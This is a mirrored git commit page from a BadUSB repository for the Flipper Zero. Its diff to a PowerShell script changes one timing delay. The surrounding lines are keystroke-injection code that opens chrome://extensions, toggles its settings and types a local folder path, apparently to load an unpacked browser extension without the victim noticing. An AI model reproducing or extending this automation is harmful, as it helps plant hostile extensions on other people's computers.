mirror of
https://github.com/beigeworm/BadUSB-Files-For-FlipperZero.git
synced 2025-12-20 22:33:32 -08:00
Update main.ps1
This commit is contained in:
@@ -147,7 +147,7 @@ $wshell.SendKeys("{TAB}") ;sleep -m 500
|
|||||||
$wshell.SendKeys("chrome://extensions/") ;sleep -m 500
|
$wshell.SendKeys("chrome://extensions/") ;sleep -m 500
|
||||||
$wshell.SendKeys("{ENTER}") ;sleep 4
|
$wshell.SendKeys("{ENTER}") ;sleep 4
|
||||||
$wshell.SendKeys("{TAB}") ;sleep -m 500
|
$wshell.SendKeys("{TAB}") ;sleep -m 500
|
||||||
$wshell.SendKeys(" ") ;sleep 4
|
$wshell.SendKeys(" ") ;sleep 2
|
||||||
$wshell.SendKeys("{TAB}") ;sleep -m 500
|
$wshell.SendKeys("{TAB}") ;sleep -m 500
|
||||||
$wshell.SendKeys("{ENTER}") ;sleep 4
|
$wshell.SendKeys("{ENTER}") ;sleep 4
|
||||||
$wshell.SendKeys("C:\Users\Public\Chrome");sleep -m 500
|
$wshell.SendKeys("C:\Users\Public\Chrome");sleep -m 500
|
||||||
|
|||||||
Reference in New Issue
Block a user